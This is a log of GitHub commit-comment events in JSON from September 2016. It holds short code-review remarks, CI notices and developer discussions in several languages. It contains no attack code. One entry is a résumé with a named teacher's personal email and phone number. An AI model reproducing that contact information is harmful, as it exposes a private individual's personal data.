{"id":"4515064493","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18895360,"position":null,"line":null,"path":null,"commit_id":"7e0d6909f47ab7e4e73b670152a2b049a63ba431","created_at":"2016-09-05T04:34:33Z","updated_at":"2016-09-05T04:34:33Z","body":"Related to: backdrop/backdrop-issues#2135 "}},"created_at":"2016-09-05T04:34:33Z"}
{"id":"4515065104","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18895363,"position":null,"line":null,"path":null,"commit_id":"c309bc6150e8a650431b0057a634f3d37ffe1717","created_at":"2016-09-05T04:34:56Z","updated_at":"2016-09-05T04:34:56Z","body":"Related to: backdrop/backdrop-issues#2135 "}},"created_at":"2016-09-05T04:34:56Z"}
{"id":"4515068010","type":"CommitCommentEvent","actor":{"login":"geeks121"},"repo":{"name":"dewishyntia/kongkow"},"payload":{"comment":{"id":18895366,"position":null,"line":null,"path":null,"commit_id":"d566a840a7cff28604e01a512b0b78783d919e16","created_at":"2016-09-05T04:36:43Z","updated_at":"2016-09-05T04:36:43Z","body":"to"}},"created_at":"2016-09-05T04:36:43Z"}
{"id":"4515068648","type":"CommitCommentEvent","actor":{"login":"countrysince"},"repo":{"name":"Samsung/GearVRf"},"payload":{"comment":{"id":18895369,"position":112,"line":112,"path":"GVRf/Extensions/SceneSerializer/sceneserializer/src/main/java/org/gearvrf/utlis/sceneserializer/SceneSerializer.java","commit_id":"759e0150896f4520f35a1428f982d7033a8f6f6a","created_at":"2016-09-05T04:37:11Z","updated_at":"2016-09-05T04:37:11Z","body":"()"}},"created_at":"2016-09-05T04:37:11Z"}
{"id":"4515068811","type":"CommitCommentEvent","actor":{"login":"koko654321"},"repo":{"name":"gauntface/simple-push-demo"},"payload":{"comment":{"id":18895370,"position":null,"line":null,"path":null,"commit_id":"94d8409afcff759b01aabf52cee2541a9819ebb8","created_at":"2016-09-05T04:37:17Z","updated_at":"2016-09-05T04:37:17Z","body":"I though hackers had their own comp and was hacking big companies or ritch peoples? In my logg uve been hacking into my comp and DESTROYED them . I REALLY REALLY HATE U. WHY CANT U DO SOMETHING U ARE ABLE TO DO???"}},"created_at":"2016-09-05T04:37:17Z"}
{"id":"4515069221","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18895372,"position":null,"line":null,"path":null,"commit_id":"06b68d466c196e3991b1d74a3a68286708d961df","created_at":"2016-09-05T04:37:31Z","updated_at":"2016-09-05T04:37:31Z","body":"Related to: backdrop/backdrop-issues#2122 "}},"created_at":"2016-09-05T04:37:31Z"}
{"id":"4515071893","type":"CommitCommentEvent","actor":{"login":"countrysince"},"repo":{"name":"Samsung/GearVRf"},"payload":{"comment":{"id":18895373,"position":null,"line":null,"path":null,"commit_id":"759e0150896f4520f35a1428f982d7033a8f6f6a","created_at":"2016-09-05T04:39:07Z","updated_at":"2016-09-05T04:39:07Z","body":"759e015"}},"created_at":"2016-09-05T04:39:07Z"}
{"id":"4515072248","type":"CommitCommentEvent","actor":{"login":"Takkiii"},"repo":{"name":"Takkiii/hungout"},"payload":{"comment":{"id":18895374,"position":null,"line":null,"path":null,"commit_id":"1575fcc2896ecb26b96b93cf00cee7c9ac718d31","created_at":"2016-09-05T04:39:21Z","updated_at":"2016-09-05T04:39:21Z","body":"![oshinomeme](https://cloud.githubusercontent.com/assets/9721056/18237551/05901e3c-736e-11e6-92a7-9ff86cc12132.jpg)\r\n\r\n![shinobu](https://cloud.githubusercontent.com/assets/9721056/18237555/0b8ed120-736e-11e6-85de-6cb935603f9d.jpg)\r\n\r\n![tsukihi](https://cloud.githubusercontent.com/assets/9721056/18237558/155d62c0-736e-11e6-8681-04a8767ddccc.gif)\r\n\r\n\r\n"}},"created_at":"2016-09-05T04:39:21Z"}
{"id":"4515072719","type":"CommitCommentEvent","actor":{"login":"countrysince"},"repo":{"name":"Samsung/GearVRf"},"payload":{"comment":{"id":18895379,"position":18,"line":18,"path":"GVRf/Extensions/SceneSerializer/settings.gradle","commit_id":"759e0150896f4520f35a1428f982d7033a8f6f6a","created_at":"2016-09-05T04:39:37Z","updated_at":"2016-09-05T04:39:37Z","body":"18"}},"created_at":"2016-09-05T04:39:37Z"}
{"id":"4515074549","type":"CommitCommentEvent","actor":{"login":"mittorn"},"repo":{"name":"FWGS/xash3d"},"payload":{"comment":{"id":18895381,"position":null,"line":null,"path":null,"commit_id":"8e23969a1b7f6126b75f510c7317d8be403d84c2","created_at":"2016-09-05T04:40:44Z","updated_at":"2016-09-05T04:40:44Z","body":"It is not registered. I've replaced command by ucmd."}},"created_at":"2016-09-05T04:40:44Z"}
{"id":"4515074867","type":"CommitCommentEvent","actor":{"login":"Gabriel439"},"repo":{"name":"Gabriel439/post-rfc"},"payload":{"comment":{"id":18895383,"position":null,"line":null,"path":null,"commit_id":"2dd4bd60163292974513e494eedbbcc2989014ab","created_at":"2016-09-05T04:40:55Z","updated_at":"2016-09-05T04:40:55Z","body":"Yeah, on more reflection I will downgrade this back to immature"}},"created_at":"2016-09-05T04:40:55Z"}
{"id":"4515076643","type":"CommitCommentEvent","actor":{"login":"guozhangwang"},"repo":{"name":"norwood/kafka"},"payload":{"comment":{"id":18895385,"position":null,"line":null,"path":null,"commit_id":"643a4a59826a6383fd5c1408f21eefe6cf994752","created_at":"2016-09-05T04:41:54Z","updated_at":"2016-09-05T04:41:54Z","body":"@norwood LGTM"}},"created_at":"2016-09-05T04:41:54Z"}
{"id":"4515077495","type":"CommitCommentEvent","actor":{"login":"baileypa"},"repo":{"name":"baileypa/website"},"payload":{"comment":{"id":18895386,"position":2,"line":8,"path":"README.md","commit_id":"4e7b76ceef544f0247fbca0debb4d3fc169afa1e","created_at":"2016-09-05T04:42:25Z","updated_at":"2016-09-05T04:42:25Z","body":"## what is this for\r\n\r\nplease explain this change"}},"created_at":"2016-09-05T04:42:25Z"}
{"id":"4515077867","type":"CommitCommentEvent","actor":{"login":"Judahmeek"},"repo":{"name":"teropa/redux-voting-client"},"payload":{"comment":{"id":18895387,"position":null,"line":null,"path":null,"commit_id":"84c51e763c662d10e5cd2de8a55554f1b75b40cd","created_at":"2016-09-05T04:42:41Z","updated_at":"2016-09-05T04:42:41Z","body":"@sebastienbarre @dearfrankg @Neitsch On the other hand, the alternative solution works well in combination with Exercise 3: http://teropa.info/blog/2015/09/10/full-stack-redux-tutorial.html#3-duplicate-vote-prevention"}},"created_at":"2016-09-05T04:42:41Z"}
{"id":"4515078454","type":"CommitCommentEvent","actor":{"login":"baileypa"},"repo":{"name":"baileypa/website"},"payload":{"comment":{"id":18895388,"position":null,"line":null,"path":null,"commit_id":"4e7b76ceef544f0247fbca0debb4d3fc169afa1e","created_at":"2016-09-05T04:43:02Z","updated_at":"2016-09-05T04:43:02Z","body":"## commit level comment\r\n\r\nadding a comment a different level\r\n"}},"created_at":"2016-09-05T04:43:02Z"}
{"id":"4515080431","type":"CommitCommentEvent","actor":{"login":"Gabriel439"},"repo":{"name":"Gabriel439/post-rfc"},"payload":{"comment":{"id":18895389,"position":null,"line":null,"path":null,"commit_id":"2dd4bd60163292974513e494eedbbcc2989014ab","created_at":"2016-09-05T04:44:12Z","updated_at":"2016-09-05T04:44:12Z","body":"Downgraded rating here: 3ca967c52df9987b59e4a9d3e07e17bff2c58a49"}},"created_at":"2016-09-05T04:44:12Z"}
{"id":"4515083121","type":"CommitCommentEvent","actor":{"login":"hoswey"},"repo":{"name":"primefaces/primeng"},"payload":{"comment":{"id":18895392,"position":null,"line":null,"path":null,"commit_id":"c0b9d3807f87528fab304c4e73679c4e60dc4689","created_at":"2016-09-05T04:45:39Z","updated_at":"2016-09-05T04:45:39Z","body":"Why remove all dependencies ? it seems the project cannot start now"}},"created_at":"2016-09-05T04:45:39Z"}
{"id":"4515083656","type":"CommitCommentEvent","actor":{"login":"YoheiKakiuchi"},"repo":{"name":"start-jsk/rtmros_common"},"payload":{"comment":{"id":18895393,"position":231,"line":231,"path":"hrpsys_ros_bridge/src/HrpsysJointTrajectoryBridge.cpp","commit_id":"a49042b567b92884062da88f287e2f71c061321e","created_at":"2016-09-05T04:45:54Z","updated_at":"2016-09-05T04:45:54Z","body":"そうですね、このコードを書いた時はfeedback使っていなかったと思うので、出していなかったのだろうと思います。"}},"created_at":"2016-09-05T04:45:54Z"}
{"id":"4515087028","type":"CommitCommentEvent","actor":{"login":"PowerGB"},"repo":{"name":"PowerGB/CSC6370_HW1"},"payload":{"comment":{"id":18895434,"position":null,"line":null,"path":null,"commit_id":"c615f85b6ba8ae0269138b5d55f4a17f36b2ccb7","created_at":"2016-09-05T04:47:48Z","updated_at":"2016-09-05T04:47:48Z","body":"ReadMe"}},"created_at":"2016-09-05T04:47:48Z"}
{"id":"4515088779","type":"CommitCommentEvent","actor":{"login":"bwangel23"},"repo":{"name":"wklken/k-vim"},"payload":{"comment":{"id":18895440,"position":5,"line":471,"path":"vimrc","commit_id":"198b0980bdf91e96e1ea8a881df4a24b5cb80c0b","created_at":"2016-09-05T04:48:48Z","updated_at":"2016-09-05T04:48:48Z","body":"@wklken ，请教一下，这句变成<leader>y是基于什么考虑啊，我反而觉得直接映射成y就挺方便的！"}},"created_at":"2016-09-05T04:48:48Z"}
{"id":"4515088992","type":"CommitCommentEvent","actor":{"login":"happylwp"},"repo":{"name":"happylwp/SecobseBlog"},"payload":{"comment":{"id":18895442,"position":null,"line":null,"path":null,"commit_id":"0a90e663629f5e558011be98ff59f93dfbcc1e8b","created_at":"2016-09-05T04:48:56Z","updated_at":"2016-09-05T04:48:56Z","body":"modified article page"}},"created_at":"2016-09-05T04:48:56Z"}
{"id":"4515089882","type":"CommitCommentEvent","actor":{"login":"CGrahamS"},"repo":{"name":"NewkirkS/Character-Generator"},"payload":{"comment":{"id":18895452,"position":null,"line":null,"path":null,"commit_id":"6f433fca0150a0b9afec8213f26960ee5daaae0d","created_at":"2016-09-05T04:49:26Z","updated_at":"2016-09-05T04:49:26Z","body":"👍"}},"created_at":"2016-09-05T04:49:26Z"}
{"id":"4515090638","type":"CommitCommentEvent","actor":{"login":"mart3323"},"repo":{"name":"mart3323/cereadro_login"},"payload":{"comment":{"id":18895454,"position":4,"line":5,"path":"sql/create_user_table.sql","commit_id":"cfba2c391333a60dbf28fddedd1b4dc602a8f0ca","created_at":"2016-09-05T04:49:51Z","updated_at":"2016-09-05T04:49:51Z","body":"MySQL threw an error when i tried to use datetime"}},"created_at":"2016-09-05T04:49:51Z"}
{"id":"4515105434","type":"CommitCommentEvent","actor":{"login":"rks92"},"repo":{"name":"rks92/LPC"},"payload":{"comment":{"id":18895474,"position":1,"line":0,"path":"app/assets/stylesheets/application.css","commit_id":"fc1729c45470d5d7405ae424d0b302fce121f616","created_at":"2016-09-05T04:58:09Z","updated_at":"2016-09-05T04:58:09Z","body":"Why were these line removed?"}},"created_at":"2016-09-05T04:58:09Z"}
{"id":"4515106598","type":"CommitCommentEvent","actor":{"login":"clumsyme"},"repo":{"name":"clumsyme/learn"},"payload":{"comment":{"id":18895477,"position":5,"line":5,"path":"js/drawAClock.js","commit_id":"f297382c3bceb13b72286dcf1d2e5ee71f1335e9","created_at":"2016-09-05T04:58:46Z","updated_at":"2016-09-05T04:58:46Z","body":"少了一个逗号。"}},"created_at":"2016-09-05T04:58:46Z"}
{"id":"4515112408","type":"CommitCommentEvent","actor":{"login":"bwangel23"},"repo":{"name":"wklken/k-vim"},"payload":{"comment":{"id":18895483,"position":452,"line":391,"path":"vimrc","commit_id":"eaa5cf53219111314325a2ec9a73d17b820cc3b5","created_at":"2016-09-05T05:01:51Z","updated_at":"2016-09-05T05:01:51Z","body":"@wklken ，你好，请教一下，这里映射`<Leader>sa`是基于什么考虑啊，为什么不用`<Leader>a`呢？"}},"created_at":"2016-09-05T05:01:51Z"}
{"id":"4515120019","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18895491,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-05T05:05:55Z","updated_at":"2016-09-05T05:05:55Z","body":"I use it."}},"created_at":"2016-09-05T05:05:55Z"}
{"id":"4515120436","type":"CommitCommentEvent","actor":{"login":"emikaallen"},"repo":{"name":"emikaallen/ada7resume"},"payload":{"comment":{"id":18895494,"position":null,"line":null,"path":null,"commit_id":"d3df00a9716123b0b8b7991e16f9fbe524badc4a","created_at":"2016-09-05T05:06:09Z","updated_at":"2016-09-05T05:06:09Z","body":"# Emika L. Allen\r\n### Pre-Engineering & Math Teacher, High School (Grades 9-12)\r\n[emika_a@hotmail.com](mailto:emika_a@hotmail.com)\r\n(360) 281-8423\r\n_________  \r\n  \r\n## Current Experience  \r\n  \r\n**Evergreen Public Schools**\r\n**Vancouver, Washington**  \r\n  \r\n  \r\n*Pre-Engineering & Math Teacher*\r\n*August 2005 - Present*\r\n  \r\n+ 10+ years of experience teaching students math (Algebra 1, Geometry, Algebra 2, PreCalculus).  \r\n+ 5+ years of experience teaching students:  \r\n    - physics concepts applied to 4 quarterly engineering projects: Wind Energy Unit, Robotics Unit, Safety Engineering Unit, and Structural Engineering Unit.  \r\n    - basic programming skills using the student-friendly language, ROBOTC.  \r\n    - \"21st-Century\" and life skills such as perseverance, teamwork & collaboration, problem solving, and oral presentation skills.  \r\n    - lab safety rules and procedures.\r\n+ 1+ years of experience teaching students:\r\n    - engineering design principles  \r\n    - Autodesk Inventor Software  \r\n    - safety rules and procedures for using 3D printers, laser engravers, and plasma cutters.  \r\n+ Collaborate with fellow teachers and district administrators to design and develop a pre-engineering curriculum that is currently used in 4 of the 5 high schools in the district.  \r\n+ Collaborate with fellow high school math teachers and college math professors to develop and align current Algebra 2 curriculum to Common Core standards.  \r\n+ Communicate early and often with staff team members, students, parents, counselors, administrators, and outside community members to meet course goals.  \r\n  \r\n*Math, Engineering, Science Achievement (MESA) Advisor/Coach*\r\n*August 2007 - May 2014*\r\n  \r\n+ Partnered with Washington State University in Vancouver to develop and run the 3-week Summer Math Scholars Program for freshmen entering high school.  \r\n+ Met with students on Tuesdays after school to provide academic tutoring in their classes.  \r\n+ Met with students on Thursdays after school to work on the MESA engineering design challenge.  \r\n  \r\n*Instructional Aide*\r\n*September 2002 - June 2005*\r\n  \r\n+ Instructed sophomore students in English, US History, and Biology on a one-to-one and small group basis.  \r\n+ Served as liaison among students, teachers, counselors, and parents in order to help the students pass their classes.\r\n  \r\n__________  \r\n  \r\n## Computer Skills and Training  \r\n  \r\n+ Microsoft Office Suite  \r\n+ C Natural Language (ROBOTC)  \r\n+ Kuta Software  \r\n+ Matlab  \r\n+ Geogebra\r\n+ HTML    \r\n  \r\n**Ada Applicants Workshop**\r\n*Seattle, WA 2016*\r\n+ Ruby\r\n+ Rails \r\n+ CSS\r\n  \r\n**Code Academy**\r\n*Online 2014*\r\n+ Python\r\n\r\n**MESA Teacher Training**\r\n*Youth Apps Challenge*\r\n*Seattle, WA 2013*\r\n+ Scratch\r\n+ Hour of Code\r\n+ Alice\r\n  \r\n__________  \r\n  \r\n## Certificates  \r\n  \r\n**Career and Technical Education (CTE)**\r\n*Science, Technology, Engineering, and Mathematics (STEM)*\r\n*Expires 2018*\r\n  \r\n**Secondary Education**\r\n*Mathematics*\r\n*Expires 2018*  \r\n__________  \r\n  \r\n## Education  \r\n  \r\n**Concordia University (Portland, OR)**\r\n*Master of Arts in Teaching (2003 - 2005)*\r\n*Secondary Education: Advanced Math*\r\n  \r\n**Vanderbilt University (Nashville, TN)**\r\n*Bachelor of Engineering (1995 - 2000)*\r\n*Chemical Engineering, Mathematics (Minor)*"}},"created_at":"2016-09-05T05:06:09Z"}
{"id":"4515122885","type":"CommitCommentEvent","actor":{"login":"ORESoftware"},"repo":{"name":"mthenw/frontail"},"payload":{"comment":{"id":18895501,"position":null,"line":null,"path":null,"commit_id":"7007f927153683a305322621303ce8d83a8d1ea1","created_at":"2016-09-05T05:07:32Z","updated_at":"2016-09-05T05:07:32Z","body":"geil ist"}},"created_at":"2016-09-05T05:07:32Z"}
{"id":"4515124583","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18895506,"position":null,"line":null,"path":null,"commit_id":"46037dfb2cec4aa920fd9a4d33e0c4dbc5f1d7ea","created_at":"2016-09-05T05:08:30Z","updated_at":"2016-09-05T05:08:30Z","body":"Should be tested with code, but looks right to me."}},"created_at":"2016-09-05T05:08:30Z"}
{"id":"4515128815","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18895515,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-05T05:10:49Z","updated_at":"2016-09-05T05:10:49Z","body":"\"-f s16be\" indicates the audio codec to be pcm_s16be as it's a raw format."}},"created_at":"2016-09-05T05:10:49Z"}
{"id":"4515134596","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18895523,"position":null,"line":null,"path":null,"commit_id":"6bb08bfec20c5678a1147022ce3ccc18db94601d","created_at":"2016-09-05T05:14:08Z","updated_at":"2016-09-05T05:14:08Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/6bb08bfec20c5678a1147022ce3ccc18db94601d#commitcomment-18895235) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/3187fb25cd8acd650603db622475ce74689919a6/daily_2016_9_5/report.md). cc @jrevels"}},"created_at":"2016-09-05T05:14:08Z"}
{"id":"4515136396","type":"CommitCommentEvent","actor":{"login":"hannesmuehleisen"},"repo":{"name":"ajdamico/asdfree"},"payload":{"comment":{"id":18895524,"position":null,"line":null,"path":null,"commit_id":"d0b965e9672161da086e30471760d08281b74343","created_at":"2016-09-05T05:15:13Z","updated_at":"2016-09-05T05:15:13Z","body":"no idea why this works i guess the design contains a db url?"}},"created_at":"2016-09-05T05:15:13Z"}
{"id":"4515137546","type":"CommitCommentEvent","actor":{"login":"3nids"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18895527,"position":null,"line":null,"path":null,"commit_id":"485d7a0a477dc80e302889e9fbb90f5074d54075","created_at":"2016-09-05T05:15:53Z","updated_at":"2016-09-05T05:15:53Z","body":"thanks a lot @jef-n !"}},"created_at":"2016-09-05T05:15:53Z"}
{"id":"4515140087","type":"CommitCommentEvent","actor":{"login":"kinghh"},"repo":{"name":"OutCast3k/coinbin"},"payload":{"comment":{"id":18895534,"position":3,"line":913,"path":"js/coin.js","commit_id":"970cd756ec364e7343639a24827b516760faa786","created_at":"2016-09-05T05:17:19Z","updated_at":"2016-09-05T05:17:19Z","body":"- 1K4dHEDFeRphKKgPEvhonegdv3KNXR8mRG"}},"created_at":"2016-09-05T05:17:19Z"}
{"id":"4515142575","type":"CommitCommentEvent","actor":{"login":"tonyxiao"},"repo":{"name":"segmentio/nightmarejs.org"},"payload":{"comment":{"id":18895539,"position":null,"line":null,"path":null,"commit_id":"1b6a9f5a32615abe1a35b0fd3f9973d0b0999328","created_at":"2016-09-05T05:18:37Z","updated_at":"2016-09-05T05:18:37Z","body":"Came across this in my github newsfeed. I thought generally server side tracking is better, curious why in this case it's removed (presumably in favor of client side tracking)?"}},"created_at":"2016-09-05T05:18:37Z"}
{"id":"4515144884","type":"CommitCommentEvent","actor":{"login":"hequan"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":18895544,"position":67,"line":47,"path":"src/osd/ECTransaction.cc","commit_id":"058cc6b248516093c1b84d4ab4d1ed2abac27a61","created_at":"2016-09-05T05:19:55Z","updated_at":"2016-09-05T05:19:55Z","body":"Hi, I have no idea that you keep the append() function, I think we need a function that can support overwrite."}},"created_at":"2016-09-05T05:19:55Z"}
{"id":"4515147641","type":"CommitCommentEvent","actor":{"login":"jaeilepp"},"repo":{"name":"mne-tools/mne-python"},"payload":{"comment":{"id":18895548,"position":58,"line":545,"path":"mne/viz/topomap.py","commit_id":"ddea6f14859f75f478c4f16e368bcc9b336c4fb9","created_at":"2016-09-05T05:21:23Z","updated_at":"2016-09-05T05:21:23Z","body":"I think the problem is that there isn't an ``axes`` parameter here. I'll make a PR."}},"created_at":"2016-09-05T05:21:23Z"}
{"id":"4515148058","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"PrismarineMC/Prismarine"},"payload":{"comment":{"id":18895550,"position":null,"line":null,"path":null,"commit_id":"62b1c9896751ddaf2c7d3232c90febed2411473e","created_at":"2016-09-05T05:21:39Z","updated_at":"2016-09-05T05:21:39Z","body":"Hello, just curious do you speak russian?"}},"created_at":"2016-09-05T05:21:39Z"}
{"id":"4515152012","type":"CommitCommentEvent","actor":{"login":"jaeilepp"},"repo":{"name":"mne-tools/mne-python"},"payload":{"comment":{"id":18895559,"position":58,"line":545,"path":"mne/viz/topomap.py","commit_id":"ddea6f14859f75f478c4f16e368bcc9b336c4fb9","created_at":"2016-09-05T05:23:54Z","updated_at":"2016-09-05T05:23:54Z","body":"No wait, yes there is. How did it crash exactly?"}},"created_at":"2016-09-05T05:23:54Z"}
{"id":"4515153745","type":"CommitCommentEvent","actor":{"login":"jaeilepp"},"repo":{"name":"mne-tools/mne-python"},"payload":{"comment":{"id":18895561,"position":58,"line":545,"path":"mne/viz/topomap.py","commit_id":"ddea6f14859f75f478c4f16e368bcc9b336c4fb9","created_at":"2016-09-05T05:24:51Z","updated_at":"2016-09-05T05:24:51Z","body":"Ok yeah, I see. I'll backport."}},"created_at":"2016-09-05T05:24:51Z"}
{"id":"4515155689","type":"CommitCommentEvent","actor":{"login":"vokimon"},"repo":{"name":"Som-Energia/somenergia-generationkwh"},"payload":{"comment":{"id":18895564,"position":null,"line":null,"path":null,"commit_id":"7a8fc5d28b97cb2c31935f8305f4e6beeb3f59bb","created_at":"2016-09-05T05:25:57Z","updated_at":"2016-09-05T05:25:57Z","body":"yep sorry"}},"created_at":"2016-09-05T05:25:57Z"}
{"id":"4515160420","type":"CommitCommentEvent","actor":{"login":"wuliaomumulin"},"repo":{"name":"wuliaomumulin/productionlogistics"},"payload":{"comment":{"id":18895567,"position":null,"line":null,"path":null,"commit_id":"ac3701796e740659112c9f11374e2ab0d81d0698","created_at":"2016-09-05T05:28:33Z","updated_at":"2016-09-05T05:28:33Z","body":"text "}},"created_at":"2016-09-05T05:28:33Z"}
{"id":"4515160597","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18895568,"position":84,"line":310,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"bacac1e42e48e240ed2e6e71df999c7e54933de2","created_at":"2016-09-05T05:28:37Z","updated_at":"2016-09-05T05:28:37Z","body":"Python will let you assign into a slice and it does what you *naively* would expect."}},"created_at":"2016-09-05T05:28:37Z"}
{"id":"4515160996","type":"CommitCommentEvent","actor":{"login":"flniu"},"repo":{"name":"wklken/k-vim"},"payload":{"comment":{"id":18895569,"position":452,"line":391,"path":"vimrc","commit_id":"eaa5cf53219111314325a2ec9a73d17b820cc3b5","created_at":"2016-09-05T05:28:49Z","updated_at":"2016-09-05T05:28:49Z","body":"@bwangel23 一般来说，设计键映射时要避免出现重复的开头，如果映射了`<Leader>a`，未来再添加`<Leader>a?`（?表示任意其它合法字符），前者就不方便使用了。所以`<Leader>`+2个字符通常是个好选择，既不太长，又不那么容易重复。\r\n查看：`:h map-ambiguous` `:h nowait`"}},"created_at":"2016-09-05T05:28:49Z"}
{"id":"4515162498","type":"CommitCommentEvent","actor":{"login":"DethRaid"},"repo":{"name":"NovaMods/nova-renderer"},"payload":{"comment":{"id":18895573,"position":34,"line":96,"path":"src/main/cpp/core/gui/gui_renderer.h","commit_id":"9be46cd23c897556b35285b14836b20d30bdcceb","created_at":"2016-09-05T05:29:36Z","updated_at":"2016-09-05T05:29:36Z","body":"If you want to own a line, you should submit a pull request with that line"}},"created_at":"2016-09-05T05:29:36Z"}
{"id":"4515162869","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":18895574,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-05T05:29:48Z","updated_at":"2016-09-05T05:29:48Z","body":"@nyalldawson It does! With 0.6mm the label appears. What does this tell you?\r\nBTW The label being on the wrong side is fixed. See my commit at https://github.com/fritsvanveen/QGIS\r\n![2016-09-05 07_24_20-qgis 2 99 0 - test grenzend](https://cloud.githubusercontent.com/assets/20473145/18238178/7b0483f8-733a-11e6-810c-4ba6f3c6d9a2.png)\r\n"}},"created_at":"2016-09-05T05:29:48Z"}
{"id":"4515163356","type":"CommitCommentEvent","actor":{"login":"shaojingjing"},"repo":{"name":"shaojingjing/setting"},"payload":{"comment":{"id":18895576,"position":null,"line":null,"path":null,"commit_id":"3ce614fbdcfec935c4e3a66e9a6342e8db7c0659","created_at":"2016-09-05T05:30:06Z","updated_at":"2016-09-05T05:30:06Z","body":"111"}},"created_at":"2016-09-05T05:30:06Z"}
{"id":"4515163481","type":"CommitCommentEvent","actor":{"login":"Jovy23"},"repo":{"name":"Jovy23/N930TUVU1APGC_Kernel"},"payload":{"comment":{"id":18895577,"position":null,"line":null,"path":null,"commit_id":"19d69705f33b7b85e532895d4da6f1285ae06d27","created_at":"2016-09-05T05:30:09Z","updated_at":"2016-09-05T05:30:09Z","body":"Hey jamison i managed to get passed some of the errors i was getting, now im running into another error when compiling check out the pastebin over at the link below to check it out. I tried doing a few things but nothing seems to work.\r\n\r\nhttp://pastebin.com/70NtNXLf"}},"created_at":"2016-09-05T05:30:09Z"}
{"id":"4515165383","type":"CommitCommentEvent","actor":{"login":"phase"},"repo":{"name":"NovaMods/nova-renderer"},"payload":{"comment":{"id":18895579,"position":34,"line":96,"path":"src/main/cpp/core/gui/gui_renderer.h","commit_id":"9be46cd23c897556b35285b14836b20d30bdcceb","created_at":"2016-09-05T05:31:00Z","updated_at":"2016-09-05T05:31:00Z","body":"This isn't anything special, just adding the namespace. Is it really worth owning only this line?"}},"created_at":"2016-09-05T05:31:00Z"}
{"id":"4515166237","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":18895582,"position":null,"line":null,"path":null,"commit_id":"0d97775bf42a72959e354ba6684d5ba6aafc8128","created_at":"2016-09-05T05:31:27Z","updated_at":"2016-09-05T05:31:27Z","body":"You forgot to increment the preference _runs_.\r\n\r\nAlso, use `||` (logical or) instead of `|` bitwise or.\r\n`||` only evaluates the other condition if the first one was not met.\r\n`|` evaluates all conditions.\r\n\r\nConsidering:\r\n\r\n```\r\nif(true || false);\r\n```\r\n\r\nFirst condition is true, so the second one won't be evaluated, no matter what it says.\r\n\r\n```\r\nif(true | false);\r\n```\r\nThis will check both, the first and the second one whether they are true or not.\r\n\r\nSo `if(mystring == null || mystring.isEmpty();` will run fine but `if(mystring == null | mystring.isEmpty());` will give a NullPointerException because BOTH are evaluated."}},"created_at":"2016-09-05T05:31:27Z"}
{"id":"4515166545","type":"CommitCommentEvent","actor":{"login":"flniu"},"repo":{"name":"wklken/k-vim"},"payload":{"comment":{"id":18895583,"position":5,"line":471,"path":"vimrc","commit_id":"198b0980bdf91e96e1ea8a881df4a24b5cb80c0b","created_at":"2016-09-05T05:31:38Z","updated_at":"2016-09-05T05:31:38Z","body":"@bwangel23 应该是保留原始y的功能。有时候并不想污染系统剪切板。"}},"created_at":"2016-09-05T05:31:38Z"}
{"id":"4515166831","type":"CommitCommentEvent","actor":{"login":"hiendv"},"repo":{"name":"hiendv/hireable"},"payload":{"comment":{"id":18895584,"position":null,"line":null,"path":null,"commit_id":"ce85816b36eb6717abd4c8cb0aaf954b92ccb21b","created_at":"2016-09-05T05:31:48Z","updated_at":"2016-09-05T05:31:48Z","body":"There is a typo in the commit message ._. I don't know where \"your\" came from. :confused: "}},"created_at":"2016-09-05T05:31:48Z"}
{"id":"4515168263","type":"CommitCommentEvent","actor":{"login":"shaojingjing"},"repo":{"name":"shaojingjing/setting"},"payload":{"comment":{"id":18895586,"position":null,"line":null,"path":null,"commit_id":"b5247a75b408f3dbac5ab69a38fa95077416f526","created_at":"2016-09-05T05:32:36Z","updated_at":"2016-09-05T05:32:36Z","body":"111"}},"created_at":"2016-09-05T05:32:36Z"}
{"id":"4515168817","type":"CommitCommentEvent","actor":{"login":"backpaper0"},"repo":{"name":"backpaper0/agolla"},"payload":{"comment":{"id":18895589,"position":null,"line":null,"path":null,"commit_id":"9428be751984713fb8358cba9cea896c69e87289","created_at":"2016-09-05T05:32:53Z","updated_at":"2016-09-05T05:32:53Z","body":"確かにwww\r\nコード書く前にコンセプト固めた方が良かったかな？w"}},"created_at":"2016-09-05T05:32:53Z"}
{"id":"4515169045","type":"CommitCommentEvent","actor":{"login":"gondek"},"repo":{"name":"ubccpsc/310"},"payload":{"comment":{"id":18895590,"position":null,"line":null,"path":null,"commit_id":"dddf21d6092f244c2ab0ae94762139fd3b01de57","created_at":"2016-09-05T05:33:00Z","updated_at":"2016-09-05T05:33:00Z","body":"Will labs be held during the first week of classes?"}},"created_at":"2016-09-05T05:33:00Z"}
